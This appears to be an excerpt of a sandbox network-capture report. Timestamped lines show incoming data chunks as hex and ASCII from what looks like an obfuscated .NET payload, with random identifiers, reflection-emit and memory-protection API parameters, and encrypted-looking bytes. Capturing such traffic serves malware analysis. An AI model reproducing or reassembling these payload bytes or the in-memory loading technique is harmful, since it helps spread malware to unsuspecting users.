2022-01-09 17:48:12 UTC	113	IN	Data Raw: 66 69 67 00 67 65 74 5f 41 6c 6c 6f 77 4f 6e 6c 79 46 69 70 73 41 6c 67 6f 72 69 74 68 6d 73 00 65 72 68 77 6b 43 6c 65 56 00 4d 44 35 43 72 79 70 74 6f 53 65 72 76 69 63 65 50 72 6f 76 69 64 65 72 00 48 61 73 68 41 6c 67 6f 72 69 74 68 6d 00 43 6f 6d 70 75 74 65 48 61 73 68 00 49 47 64 68 45 77 41 64 73 00 52 65 61 64 00 57 32 37 69 69 42 35 32 34 00 54 72 61 6e 73 66 6f 72 6d 42 6c 6f 63 6b 00 75 32 75 35 73 43 35 4c 48 00 42 69 6e 61 72 79 52 65 61 64 65 72 00 67 65 74 5f 42 61 73 65 53 74 72 65 61 6d 00 73 65 74 5f 50 6f 73 69 74 69 6f 6e 00 52 65 61 64 55 49 6e 74 33 32 00 75 75 35 6c 30 50 71 44 58 00 50 61 72 61 6d 65 74 65 72 49 6e 66 6f 00 44 79 6e 61 6d 69 63 4d 65 74 68 6f 64 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 Data Ascii: figget_AllowOnlyFipsAlgorithmserhwkCleVMD5CryptoServiceProviderHashAlgorithmComputeHashIGdhEwAdsReadW27iiB524TransformBlocku2u5sC5LHBinaryReaderget_BaseStreamset_PositionReadUInt32uu5l0PqDXParameterInfoDynamicMethodSystem.Reflection.Emit
2022-01-09 17:48:12 UTC	117	IN	Data Raw: 74 72 79 00 6e 61 74 69 76 65 53 69 7a 65 4f 66 43 6f 64 65 00 4d 6f 58 49 53 6e 55 69 6e 6f 00 53 76 59 49 6b 71 61 52 63 39 00 50 54 49 49 76 5a 4a 6d 66 43 00 6d 39 4f 49 4f 38 51 30 45 4b 00 7a 34 37 49 74 31 39 78 65 6b 00 4e 51 31 49 5a 79 54 30 6a 49 00 77 67 5a 49 75 6d 49 50 73 46 00 56 32 36 49 37 4d 32 55 58 6a 00 6c 70 4e 61 6d 65 00 6c 70 54 79 70 65 00 6c 70 41 64 64 72 65 73 73 00 64 77 53 69 7a 65 00 66 6c 41 6c 6c 6f 63 61 74 69 6f 6e 54 79 70 65 00 66 6c 50 72 6f 74 65 63 74 00 62 75 66 66 65 72 00 73 69 7a 65 00 66 6c 4e 65 77 50 72 6f 74 65 63 74 00 6c 70 66 6c 4f 6c 64 50 72 6f 74 65 63 74 00 64 77 44 65 73 69 72 65 64 41 63 63 65 73 73 00 62 49 6e 68 65 72 69 74 48 61 6e 64 6c 65 00 70 74 72 00 76 61 6c 75 65 5f 5f 00 74 34 31 31 62 Data Ascii: trynativeSizeOfCodeMoXISnUinoSvYIkqaRc9PTIIvZJmfCm9OIO8Q0EKz47It19xekNQ1IZyT0jIwgZIumIPsFV26I7M2UXjlpNamelpTypelpAddressdwSizeflAllocationTypeflProtectbuffersizeflNewProtectlpflOldProtectdwDesiredAccessbInheritHandleptrvalue__t411b
2022-01-09 17:48:12 UTC	121	IN	Data Raw: 35 59 36 75 4a 62 52 57 54 78 54 6c 50 52 51 4f 34 00 7a 4f 53 65 79 78 4a 4b 6e 6b 41 5a 47 66 6d 78 4b 63 44 00 48 66 47 69 4a 6a 4a 5a 53 64 32 78 35 57 62 39 54 63 64 00 6f 4c 42 69 55 65 50 5a 32 50 00 63 55 43 69 51 76 5a 6f 70 78 00 6d 76 37 77 6f 53 4a 55 6a 39 30 51 74 74 33 6f 36 4b 30 00 46 32 78 68 78 72 4a 77 67 6e 47 66 45 45 4e 59 72 49 35 00 64 32 30 68 49 35 4a 64 54 35 36 68 45 6b 35 73 66 74 48 00 72 70 78 69 64 79 37 66 6b 5a 00 53 44 4f 69 39 33 4f 62 53 6f 00 62 36 59 69 53 72 31 57 73 31 00 72 71 31 57 34 6e 4a 70 77 32 41 37 62 66 45 50 68 32 4e 00 65 54 57 75 34 57 4a 43 33 41 78 36 33 42 49 38 71 4e 72 00 53 43 44 76 5a 42 4a 33 38 67 63 4d 76 73 72 54 51 71 46 00 52 78 51 69 6b 41 47 70 62 56 00 6f 62 30 69 74 59 37 69 6c 56 00 Data Ascii: 5Y6uJbRWTxTlPRQO4zOSeyxJKnkAZGfmxKcDHfGiJjJZSd2x5Wb9TcdoLBiUePZ2PcUCiQvZopxmv7woSJUj90Qtt3o6K0F2xhxrJwgnGfEENYrI5d20hI5JdT56hEk5sftHrpxidy7fkZSDOi93ObSob6YiSr1Ws1rq1W4nJpw2A7bfEPh2NeTWu4WJC3Ax63BI8qNrSCDvZBJ38gcMvsrTQqFRxQikAGpbVob0itY7ilV
2022-01-09 17:48:12 UTC	125	IN	Data Raw: 5f 65 62 61 38 35 39 34 38 34 39 31 39 34 34 64 30 39 32 61 38 62 38 63 32 38 32 32 34 35 62 36 62 00 6d 5f 35 31 66 37 66 32 30 66 39 30 33 63 34 33 66 31 39 63 61 65 65 62 32 37 38 33 35 36 62 39 30 66 00 6d 5f 66 62 62 32 35 65 66 32 39 33 65 37 34 30 34 63 38 32 62 39 33 38 30 37 66 34 30 35 64 30 63 31 00 6d 5f 38 66 62 62 63 61 63 30 37 34 31 38 34 61 64 33 39 64 62 36 37 36 32 63 35 31 66 31 37 32 38 30 00 6d 5f 30 38 61 64 64 37 37 64 65 36 64 34 34 64 65 34 39 30 36 34 61 65 32 66 33 36 64 61 34 62 64 36 00 6d 5f 38 62 62 65 33 66 35 38 31 36 32 62 34 37 32 61 39 61 37 36 34 35 65 38 62 37 65 66 64 39 64 36 00 6d 5f 65 39 37 66 32 64 64 33 33 30 39 35 34 34 30 66 62 31 66 65 34 35 31 62 39 63 30 38 63 39 63 66 00 6d 5f 65 38 65 37 34 38 61 64 66 Data Ascii: _eba85948491944d092a8b8c282245b6bm_51f7f20f903c43f19caeeb278356b90fm_fbb25ef293e7404c82b93807f405d0c1m_8fbbcac074184ad39db6762c51f17280m_08add77de6d44de49064ae2f36da4bd6m_8bbe3f58162b472a9a7645e8b7efd9d6m_e97f2dd33095440fb1fe451b9c08c9cfm_e8e748adf
2022-01-09 17:48:12 UTC	128	IN	Data Raw: 33 36 38 64 62 64 64 30 38 63 35 62 63 61 39 65 61 63 00 6d 5f 39 34 66 39 32 31 32 61 61 62 62 39 34 39 66 35 38 61 62 34 33 35 62 64 62 30 34 65 62 35 38 64 00 6d 5f 34 39 38 39 61 38 31 61 61 34 39 65 34 34 64 62 39 62 31 63 63 37 36 66 30 66 34 33 35 35 62 61 00 6d 5f 66 32 36 34 34 65 36 33 34 35 35 39 34 64 66 61 61 36 63 62 31 66 63 66 37 38 63 35 62 62 62 31 00 6d 5f 62 37 63 66 34 66 39 32 34 37 35 61 34 62 33 35 61 61 31 37 64 66 64 37 63 61 61 34 61 62 35 33 00 6d 5f 30 64 62 66 30 35 65 62 64 37 62 36 34 64 34 37 39 33 36 35 39 65 39 32 37 37 30 66 38 39 37 36 00 6d 5f 39 30 37 39 30 32 32 30 38 30 38 35 34 63 35 65 38 31 38 62 31 64 38 65 36 34 36 39 37 34 39 63 00 6d 5f 32 61 38 35 61 64 36 66 33 33 35 62 34 30 32 37 39 64 31 64 64 32 63 66 Data Ascii: 368dbdd08c5bca9eacm_94f9212aabb949f58ab435bdb04eb58dm_4989a81aa49e44db9b1cc76f0f4355bam_f2644e6345594dfaa6cb1fcf78c5bbb1m_b7cf4f92475a4b35aa17dfd7caa4ab53m_0dbf05ebd7b64d4793659e92770f8976m_9079022080854c5e818b1d8e6469749cm_2a85ad6f335b40279d1dd2cf
2022-01-09 17:48:12 UTC	132	IN	Data Raw: 58 00 49 00 42 00 77 00 39 00 46 00 54 00 41 00 53 00 46 00 44 00 41 00 4d 00 5a 00 33 00 64 00 78 00 44 00 69 00 38 00 52 00 57 00 51 00 3d 00 3d 00 00 61 49 00 61 00 74 00 53 00 74 00 6e 00 65 00 6d 00 6d 00 6f 00 43 00 65 00 64 00 6f 00 43 00 6d 00 6f 00 44 00 65 00 64 00 6f 00 43 00 6d 00 65 00 74 00 73 00 79 00 53 00 34 00 33 00 36 00 31 00 35 00 43 00 38 00 47 00 48 00 42 00 73 00 75 00 4d 00 6a 00 4d 00 75 00 4b 00 53 00 30 00 78 00 00 79 45 00 61 00 74 00 53 00 74 00 6e 00 65 00 6d 00 6d 00 6f 00 43 00 65 00 64 00 6f 00 43 00 6d 00 6f 00 44 00 65 00 64 00 6f 00 43 00 6d 00 65 00 74 00 73 00 79 00 53 00 34 00 33 00 36 00 31 00 35 00 52 00 6b 00 61 00 4c 00 78 00 74 00 61 00 4a 00 6e 00 51 00 36 00 4b 00 42 00 63 00 37 00 49 00 32 00 59 00 35 00 46 Data Ascii: XIBw9FTASFDAMZ3dxDi8RWQ==aIatStnemmoCedoCmoDedoCmetsyS43615C8GHBsuMjMuKS0xyEatStnemmoCedoCmoDedoCmetsyS43615RkaLxtaJnQ6KBc7I2Y5F
2022-01-09 17:48:12 UTC	136	IN	Data Raw: 10 11 80 88 10 11 80 84 12 80 b5 07 20 02 02 18 0f 11 6c 0d 20 04 12 80 b5 18 0f 11 6c 12 80 b9 1c 05 20 02 09 18 18 0b 20 04 12 80 b5 18 18 12 80 b9 1c 06 20 01 09 12 80 b5 0b 20 06 09 18 10 18 09 10 09 09 09 11 20 08 12 80 b5 18 10 18 09 10 09 09 09 12 80 b9 1c 0a 20 03 09 10 18 10 09 12 80 b5 04 20 01 09 18 03 20 00 18 09 20 02 12 80 b5 12 80 b9 1c 06 20 01 18 12 80 b5 02 06 09 02 06 07 03 06 11 74 03 06 11 7c 02 06 08 02 06 06 05 00 00 12 80 8c 04 06 11 80 94 04 06 12 80 bd 04 06 12 80 9c 04 00 01 01 08 11 07 06 12 80 95 1d 12 80 c1 08 08 12 80 c5 12 80 c1 05 00 00 12 80 9c 0a 20 03 12 80 b5 1c 12 80 b9 1c 06 20 01 01 12 80 b5 02 06 02 04 06 12 80 c9 03 06 1d 08 04 06 12 80 cc 04 06 12 80 dc 04 06 12 80 cd 07 06 15 12 80 d1 01 08 04 06 12 80 d8 04 06 Data Ascii: l l t\|
2022-01-09 17:48:12 UTC	140	IN	Data Raw: 12 81 70 05 00 00 12 81 70 04 06 11 81 78 06 20 01 01 11 81 78 08 00 01 11 81 18 12 80 95 09 00 02 12 81 7c 12 80 95 1c 0c 07 04 11 81 18 08 12 81 7c 11 81 18 06 00 01 12 81 7c 1c 09 07 03 12 80 95 1c 12 81 7c 05 00 00 12 81 7c 04 06 12 81 80 07 20 02 01 1c 12 80 95 05 00 00 12 81 80 04 06 12 81 84 06 07 02 11 81 8c 03 05 00 00 12 81 84 09 06 15 12 80 d1 01 12 81 7c 08 15 12 80 d1 01 12 81 7c 05 00 00 12 81 88 07 15 12 81 90 01 13 00 04 06 11 81 a8 04 06 11 81 a4 04 06 11 81 b0 04 06 11 81 ac 04 06 11 81 98 04 06 11 81 9c 04 06 11 81 a0 04 06 12 81 b4 05 00 00 12 81 b4 04 06 12 81 b8 06 20 03 0e 1c 0e 0e 09 00 04 0e 1c 0e 0e 12 81 b8 04 06 12 81 bc 08 20 01 12 80 95 11 80 e1 0b 00 02 12 80 95 11 80 e1 12 81 bc 04 06 12 81 c0 0d 20 03 12 75 11 81 e1 12 80 Data Ascii: ppx x\|\|\|\|\| \|\| u
2022-01-09 17:48:12 UTC	145	IN	Data Raw: bb 6a 36 02 07 14 03 05 14 a0 f4 ae df 88 2e 7c 3e a9 b5 d4 ed e5 a3 1d df 4c 8b be 3b 67 16 62 4b fd c5 f4 4a 81 70 ff 19 40 35 3a cf ef 6c 2c 44 1e f8 d9 c8 a2 66 c1 c6 ca 23 f9 7d f2 70 51 d7 64 f7 5b 38 ed fb fe 20 2f 42 9d 25 bf fe 66 95 e5 b0 fc 85 08 ff ef e0 f6 d9 2c 77 0a 48 11 dd 98 75 f3 20 25 1e 0b a1 36 65 fc eb ee cb 3e b4 11 43 58 56 24 f6 70 fe 0c 64 fe 06 64 52 b7 49 b8 0a 73 79 ef ca 54 d7 89 f4 58 83 0d 3d 2a ba cd d1 6d af a1 59 6b ed 93 ac 10 7e 64 a2 61 26 71 c7 20 8f 12 ad a4 e6 5c e6 e1 b0 26 41 e9 96 2f e9 35 e0 8c ec 23 38 96 36 d0 1b 18 1d 25 2a 9d e5 5f 57 01 a1 4d cf ae da 27 d6 c2 f2 ca 4f d4 1d 65 84 ad 8c 0c 0b d1 a6 6b 7a 9b f9 ac 81 c2 1f 94 0f d9 6f 65 4f 4e 91 99 50 32 14 cd 63 a2 a0 65 f6 b7 9c f3 f4 42 f8 f3 c9 95 6e Data Ascii: j6.\|>L;gbKJp@5:l,Df#}pQd[8 /B%f,wHu %6e>CXV$pddRIsyTX=mYk~da&q \&A/5#86%_WM'OekzoeONP2ceBn
2022-01-09 17:48:12 UTC	149	IN	Data Raw: a7 09 0d 3d b6 4c 74 11 4f 72 5c 74 f6 84 d2 b5 1b 0c b6 c4 93 00 08 5e 00 b5 a2 53 96 7e 23 8c 41 c0 b3 0a 26 75 93 74 86 9a 3f df 82 f1 f9 6b 51 b8 df 75 ec 6a 32 76 e3 c9 d3 b4 40 60 cd c9 c3 4a b7 56 f5 21 f9 3a 14 05 5d 31 e2 7c 8e 99 62 07 6a 40 1d b0 dd a8 64 99 9a a4 0f 6e a1 93 36 b9 b5 30 e1 8d cf 60 aa d6 df b7 07 4d 2e 2f 21 b7 75 1b 82 68 83 f6 05 c3 03 11 c2 48 01 b8 6c fa b3 34 12 a7 8f 57 8f e7 6f db 06 fb 24 68 4e 54 5b 97 cc 7e 19 de b9 a0 51 6c 57 04 63 72 1d a4 20 82 d0 3f 26 42 59 d3 fb 75 3d 02 ee a9 00 50 d7 f1 9a eb 15 b5 21 41 5b e9 6b 86 c0 1d 8e 7a 50 2c f2 19 35 74 66 21 81 e4 19 5b 33 6f 44 9f 60 fa a6 ca 7d 76 3c 6a a3 80 5f 3c 6c 6c 79 55 b0 16 da 78 34 dc b4 ea 0b cc e9 2b 38 bb cb f8 0e 4a 97 41 21 bd 5e ba 99 59 8f e1 7c Data Ascii: =LtOr\t^S~#A&ut?kQuj2v@`JV!:]1\|bj@dn60`M./!uhHl4Wo$hNT[~QlWcr ?&BYu=P!A[kzP,5tf![3oD`}v<j_<llyUx4+8JA!^Y\|
2022-01-09 17:48:12 UTC	153	IN	Data Raw: 5e a2 9b 49 1f 91 cc d1 3e a2 0b 63 33 ba 75 45 f5 44 54 24 32 ef 3e ba a2 a7 54 b8 6b d1 65 3c 13 45 94 d3 d5 d9 42 e4 c7 53 e5 f8 18 66 63 22 13 85 97 4a 83 01 1b 46 62 c8 80 25 76 49 22 df 4f 69 b3 93 0c 1e c2 10 60 f2 b0 99 5d 2e 70 bb 2e ce 3b 1e 56 6e f1 b1 f9 4a b2 59 8f 6e ec 9c c4 c9 00 2b 7d 84 db db f0 09 9a 11 0b b9 3e d8 c2 e2 15 92 6f fb 2f 76 6d ba 2c 8f 85 6e 0e 81 e1 09 cc 93 d3 ac 88 8d ae 84 ea 8d db d7 b4 bf d4 0c 60 ef b1 36 6d 2d 42 b7 ed 77 b4 2d c2 3a 22 7f ba 07 ee 51 91 ee 4a 37 a0 1d 1f 9a 61 f6 e1 a9 cc 4a ae a1 8d 69 eb 4e 0d 37 06 81 e1 b8 f5 ed ec a4 2c 3b a8 3e a4 41 0f fa af bd cb 8a 7d 74 07 5a da 7c 18 59 37 34 69 94 1d 05 96 4c 01 79 7e 5f 5d 0d 67 ad ab 43 4d af 57 74 97 b2 a8 27 64 a9 f2 63 78 cb 19 62 a0 e1 32 61 a4 Data Ascii: ^I>c3uEDT$2>Tke<EBSfc"JFb%vI"Oi`].p.;VnJYn+}>o/vm,n`6m-Bw-:"QJ7aJiN7,;>A}tZ\|Y74iLy~_]gCMWt'dcxb2a
2022-01-09 17:48:12 UTC	157	IN	Data Raw: 7e c7 c4 7e 7c e5 9a 00 67 aa a5 32 1d 37 6d c7 eb 8d 38 6f ed 37 5b 76 69 db 1d e6 cb 11 f9 36 ac de 53 d5 17 b7 f6 c5 c4 a6 d7 ab 69 36 4a c8 78 3b e0 c8 1e 3f 26 3f 17 6f 05 5c 65 17 28 99 7c 17 f9 a4 cb d1 f7 03 e7 78 a4 f0 60 96 81 1b cf ee 2d a9 70 2e fd ea bf 97 6b 5d 21 c8 5d 8d aa 44 f8 75 6b 25 fc bb eb 8c e5 c2 19 64 9d 5d db 35 b6 81 e4 dc 10 f2 62 40 43 ce a7 5b a4 3f 06 e5 e3 e5 02 1b ba 91 c2 f7 bc 7d b5 b9 df 2e 27 bd 75 3a 49 93 64 55 a6 d3 85 a8 a8 b1 c4 e9 c6 c9 c9 b0 36 ce a9 22 70 e4 ff 8b df 4b b5 27 10 38 13 ba c2 14 80 80 73 b2 e0 38 1a db f2 a6 6c d9 a1 78 64 89 12 d0 f0 f6 14 49 84 27 e0 ea 94 80 70 b4 66 e9 63 fb 14 5a ef c4 d5 0a 0c 8d 6e 89 9c 0c 95 27 71 5f d4 bd e0 0e 94 40 bb c3 a0 ed 48 d9 de 8a ac 77 2b 4a 36 c9 a7 91 cd Data Ascii: ~~\|g27m8o7[vi6Si6Jx;?&?o\e(\|x`-p.k]!]Duk%d]5b@C[?}.'u:IdU6"pK'8s8lxdI'pfcZn'q_@Hw+J6
2022-01-09 17:48:12 UTC	160	IN	Data Raw: 8d 3e b5 8a b2 42 45 d6 45 14 f2 a8 96 d2 e0 aa 51 1f 04 fb 82 b5 ba 63 fd 64 11 a5 fe cd fd 95 af 15 52 04 eb c1 cc be ea 18 15 dc b9 43 53 b7 7d 92 01 49 d5 ab 6b 0e 14 45 db 64 88 6e 61 34 32 ca 8d dc ef 49 39 2f 92 f8 60 1c 40 e9 07 cf b1 48 c4 00 72 ff 36 41 20 fa ed 14 d6 39 ae c6 77 ee 60 b5 b7 19 bb 84 c8 81 3f b5 94 2c f0 ba 96 0f c2 3f 3e 57 f2 1d b4 99 e7 ce fa 3d 78 32 9b e2 66 eb f1 2f 26 73 8d 5b 0b 78 11 65 71 e5 0e 90 35 58 31 5b b9 28 e4 2a 28 f4 de 74 71 f6 a6 12 11 55 c5 29 1f 96 d0 1d 2a 6c 48 a0 ba 61 ac 75 38 f2 6f fc ec e1 b9 1d 36 4b 29 bc 48 f6 c6 01 e8 bf d6 1e 32 c6 24 82 5e c3 0f 0c af 02 13 5f 03 89 54 40 8c ea fd fb af e8 9d 60 0c d9 65 12 3d b7 fc df 7d f8 d4 0d a1 c1 5e da 66 f3 57 b5 26 21 7f 74 db c9 f8 1f 71 5d ae 40 01 Data Ascii: >BEEQcdRCS}IkEdna42I9/`@Hr6A 9w`?,?>W=x2f/&s[xeq5X1[((tqU)lHau8o6K)H2$^_T@`e=}^fW&!tq]@
2022-01-09 17:48:12 UTC	164	IN	Data Raw: 13 fe 63 c8 45 30 fe 2c 29 0d f2 63 f6 fd 39 1a ac 15 d3 6d f8 f3 85 9b 50 d9 38 57 16 99 b0 c3 a0 3d 3e 9c c8 b3 e7 99 d6 b9 8e 47 79 48 1d 13 25 f4 11 51 f2 a2 1c 29 ec 09 26 40 16 c6 6d 6d e5 c7 06 97 d2 71 20 41 5a c9 a2 ef 43 1e 59 8d 03 f7 10 fc 02 04 5b 27 35 08 e3 c4 d7 7d 1f a1 db a1 ea d0 f7 84 a6 c7 c8 80 ba 39 4d 7c 36 c2 20 d8 fe ab 93 e5 89 d4 38 06 48 6c 69 5c 56 ad 8e 8c 0d 6d 46 de 08 20 2e be 87 2d aa 9a ff dc 62 1a 00 3c a6 45 d2 b9 01 2f df 06 69 94 d0 f9 48 ee 4a 8c 3d b4 21 a5 f1 6a 78 b8 cf 45 b0 a1 c0 36 89 16 ac 5b 0d 35 35 fd 0d d7 02 65 8f 0b 1c 3b ca 34 d9 e6 5b 59 97 77 17 2a 56 5d 60 8a 46 5f 6e 2c 5e 72 74 ef c4 f8 c3 df 62 5e 9e 24 83 ef 7d d6 76 bc 6e 4f cb fe ba e9 43 27 90 5b 8b 65 69 e6 ab 80 61 b9 e9 b0 be a0 ee db ef Data Ascii: cE0,)c9mP8W=>GyH%Q)&@mmq AZCY['5}9M\|6 8Hli\VmF .-b<E/iHJ=!jxE6[55e;4[Yw*V]`F_n,^rtb^$}vnOC'[eia
2022-01-09 17:48:12 UTC	168	IN	Data Raw: 1a a6 3c 9c 12 22 99 1a 69 ca a5 44 4f 8f 15 ca f4 ab ce 28 28 8d 27 3f ec 0b 91 6b 21 f3 96 93 62 06 0c 1d fe 4a cc 7c 3a 7b 4c 59 f7 7d df 74 6e bf 09 0d 06 bd 38 2f ab c6 e3 d8 ca f7 4e 6f 6a 26 00 04 5a 9d 1f ea b5 12 6e 1b 2a f4 8c 04 8e cd bb 9c 02 aa f6 b3 18 ef f0 77 54 e3 af 9b d2 45 34 1c c1 21 a4 1b fc 65 3f 77 01 70 0c 9f 5f a0 4e 06 b8 c0 3f 3a 9c 98 1e 58 b0 a7 c8 2c 9a 40 1b 8e 7c fe 4d 9e bc fd f8 a5 3e 4f 79 98 31 41 08 2e 8c 0b fd 74 45 4f 03 d3 4d d7 c6 02 70 5e 28 d5 ee ac c4 a1 f6 ff 26 e0 93 b9 9b 67 ff fa 61 f2 c9 3a e2 d2 61 b8 b3 c1 ae 30 50 f8 6c 53 e5 90 8d 84 75 25 0b 83 0a 62 80 81 07 28 26 0a 5d 87 ad af 4a be 0a b8 0d 9f 98 88 c6 bb 33 e0 7d 12 b0 39 54 8e 9f ae 2f d9 8e 7b 04 b7 a9 df 0f 34 3a 0f 7c b1 8e a3 2f b2 9f 5b 1e Data Ascii: <"iDO(('?k!bJ\|:{LY}tn8/Noj&Zn*wTE4!e?wp_N?:X,@\|M>Oy1A.tEOMp^(&ga:a0PlSu%b(&]J3}9T/{4:\|/[
2022-01-09 17:48:12 UTC	172	IN	Data Raw: 3f cd 6b 95 93 97 23 47 46 b8 7e c3 30 8f 10 ca 62 76 f1 4d 49 37 d4 b0 b0 82 d9 d7 27 04 11 91 0c fa 3c 18 ce 95 1f 25 15 dc 2a b4 6c 2b 70 fb 46 83 6f aa b5 bd a4 e9 bb fc be 93 78 ba 68 a4 fd f1 3f e1 71 8d 66 e8 ae a6 a8 51 dd 2e 88 bb 00 3b bb a9 b8 95 15 fd 42 17 68 5a 55 0c d0 53 c5 1b 41 a5 ba d6 96 52 6d 5a 99 50 79 8d a6 3e 9c 96 38 ac 02 8b 5e dc c3 cd e5 06 b4 71 2f 79 92 f6 6e 80 56 12 02 dc f6 31 0e cf 4f 1f 16 61 91 d7 4a b1 b9 b8 d8 52 43 28 93 12 1b 2b df 90 62 a2 8d 79 98 12 c8 1b 44 fd 9f 8f 31 a3 b2 81 86 7a b7 a6 e3 01 5c 92 26 4c c4 e5 c5 98 f7 82 6a 9a 76 2b 50 99 24 dc 4e df 6a b6 11 4d d7 c0 90 e3 7d 55 7c 9e f6 42 ec fe 13 2c c0 c8 84 ac b5 4a 08 07 90 75 8f 94 01 70 dd ff 06 bd 44 99 f8 8a 52 9d 39 4b b4 63 c9 8e e9 ac ac f7 dd Data Ascii: ?k#GF~0bvMI7'<%*l+pFoxh?qfQ.;BhZUSARmZPy>8^q/ynV1OaJRC(+byD1z\&Ljv+P$NjM}U\|B,JupDR9Kc
2022-01-09 17:48:12 UTC	177	IN	Data Raw: c0 a0 b7 87 2c 0e 92 10 65 ee c4 42 c6 e5 41 2e 06 71 a3 2a de 9a af cd 33 12 fd 84 c0 b4 ea 48 77 66 5e 54 ce 01 6c 90 54 65 d6 fc 6e 3f a0 07 8c d4 d8 ab dc 85 33 df 44 d7 a4 4f 98 e8 52 a4 fd 5b 32 6d b1 34 63 9f 60 29 be a0 f2 a2 ad 77 ac fa 47 47 95 3a 82 90 15 cc 70 06 fa 9a a9 f9 bf 96 75 76 a0 3c 43 3f 82 63 85 b9 62 a6 26 07 5c 55 bd 12 7e 2e c3 9b 3b ed 02 34 db f0 1e 0e 39 c1 ae 2c 8b aa 23 9f c2 eb 2c 31 3d 30 d1 79 c0 3f 5f 0e 10 43 ad 2a 12 cb c5 03 00 db 91 96 03 cb 16 8a 2f 6e 18 00 77 86 40 b2 3a b9 59 b7 31 3c 87 44 05 4a 2c 67 37 2f cc c4 19 de af d9 1e 32 9b 96 ac 0c 3a 5f 09 a6 52 eb 82 70 b9 59 aa c7 e4 4d c8 88 05 ef 87 84 98 b2 38 6f 7e ac 33 04 66 27 7a ec 83 b1 52 10 92 1b 66 98 e0 7e c9 a2 09 0b 46 bb 0f f5 81 8c 7d 8f d4 84 01 Data Ascii: ,eBA.q3Hwf^TlTen?3DOR[2m4c`)wGG:puv<C?cb&\U~.;49,#,1=0y?_C/nw@:Y1<DJ,g7/2:_RpYM8o~3f'zRf~F}
2022-01-09 17:48:12 UTC	181	IN	Data Raw: 81 66 63 84 5a 48 82 ca 8c a0 dc 74 19 f4 84 84 dd f2 bb 86 3f 49 36 e2 d0 f8 5a 34 36 2e b2 fe 6f 9f 4c a8 73 10 fc 76 88 40 50 55 62 15 77 b4 30 e9 a1 4a 86 be 53 bd 8a 3e 5d d2 49 3b 0b 39 c9 e3 6d 82 63 f1 fb 48 07 83 60 86 d8 7c 36 26 fc 44 d5 ce 9d a7 a1 d0 22 f2 f5 0e 58 4f ca 1c f5 58 16 0a 71 32 40 49 4c 2f 6f 99 1f dc 13 8b b6 66 09 3a b8 aa 3f 95 fb 9f 6b e8 3d 3e c8 f3 c1 49 c4 e8 73 9a 18 30 13 85 17 0e c0 91 80 b0 c8 98 a1 d8 13 20 1d 22 c5 a4 18 cc cd 1c 9c d1 c6 eb 9b 9d c5 b1 bb f7 42 a9 3c e1 33 17 28 ea 7e a5 d2 09 02 40 90 04 44 c1 8c b3 d9 40 e0 c7 1f 25 c6 32 a1 3d 11 25 76 b5 76 25 58 5f 94 50 1f ba 65 f1 bd 99 94 03 e8 ae 52 68 dd d9 8a fe 1a 7d f5 01 7a 05 77 d8 54 72 fb 84 cc e7 ae aa d5 af 72 d9 fa 68 51 3a f0 79 9f d0 f1 2b 13 Data Ascii: fcZHt?I6Z46.oLsv@PUbw0JS>]I;9mcH`\|6&D"XOXq2@IL/of:?k=>Is0 "B<3(~@D@%2=%vv%X_PeRh}zwTrrhQ:y+
2022-01-09 17:48:12 UTC	185	IN	Data Raw: 50 a0 16 00 26 fe 0c 95 7c 52 0b 57 fe c4 35 fe 66 42 bd b5 8b 55 67 b7 29 59 81 7e a0 be bd de e9 e0 20 4f 14 88 1c 03 4f 5e 51 aa 46 52 95 de 53 cb c1 80 03 76 a3 1d 07 f8 73 2d 05 37 9e f6 2d e6 b9 4f 01 31 9e 59 c8 a8 5a 49 d5 d1 79 05 28 16 81 ed fa f4 7b e8 76 5e 33 c0 be ee 2f 20 a5 9e ed 57 5f 79 b8 9c 76 bb a7 a0 f7 7f 6b f6 b1 e1 21 05 9b a9 db 29 c7 f7 67 a9 8a b5 39 32 58 c9 0c b4 40 e7 66 db 54 97 fa 98 16 0e bd d1 ac d8 4c 63 5a a8 88 62 0b c4 73 af 7f c9 a7 f2 e1 47 b6 be 71 1f 9f c3 94 f1 a7 9b 68 36 f5 34 35 1a 02 f9 27 5f d6 2d 96 b3 61 1c 92 29 6c aa 17 02 d4 ce 1b 33 85 e4 c0 56 bb 43 b9 58 52 35 85 f2 83 b6 1d 03 ae 45 fc 03 ae e2 e9 d5 e9 c1 10 27 22 cb b3 47 96 66 b9 3c 90 39 ab a5 e1 a3 61 6b 73 27 79 dc c3 d2 bc 44 61 77 fe 42 e4 Data Ascii: P&\|RW5fBUg)Y~ OO^QFRSvs-7-O1YZIy({v^3/ W_yvk!)g92X@fTLcZbsGqh645'_-a)l3VCXR5E'"Gf<9aks'yDawB
2022-01-09 17:48:12 UTC	189	IN	Data Raw: 5b 38 50 d3 96 90 81 dd b9 6c 47 1b b9 f9 f1 fb c0 4f 9b a1 92 51 b7 c0 43 45 32 b9 b0 b0 2b b4 50 81 ea 55 e9 cf fb 70 88 55 6a ec a7 6f a6 8f 5f f8 b1 85 ed 7d 6f bc 85 44 b2 0b 64 01 78 b0 4c 12 be e6 86 10 8d 30 f0 aa 49 00 9b 7c 01 ab 91 21 7c 4e 80 23 e2 e9 6f c4 a5 28 12 35 03 59 16 47 d3 b0 c0 52 54 de 37 39 c1 d6 87 7f fa e3 d1 4f 27 0d 95 d0 d6 0e 4a 54 4d 5b 1b bd f0 b5 88 b4 07 26 29 ff d1 70 8c 10 2b 11 f1 77 67 35 22 df c6 68 68 f5 32 e7 d3 12 01 df f1 18 b1 78 8f 5f 0c 4a 3b e1 5e 56 35 5e d2 0d c1 1f 58 6d 50 9f 15 7f 8d ad 78 b2 ea d6 19 6d f1 cd 7d ce fe 4f 48 db d9 a5 18 84 63 72 8f f0 9f e5 92 f6 a8 99 85 56 17 91 34 d1 ba b0 fb 79 a3 d4 bc 82 89 12 f5 66 5a 7b a8 00 40 ee f8 46 47 10 2c 63 06 10 4f 81 8b 1a 6b c2 3d b1 ed 79 61 14 3b Data Ascii: [8PlGOQCE2+PUpUjo_}oDdxL0I\|!\|N#o(5YGRT79O'JTM[&)p+wg5"hh2x_J;^V5^XmPxm}OHcrV4yfZ{@FG,cOk=ya;
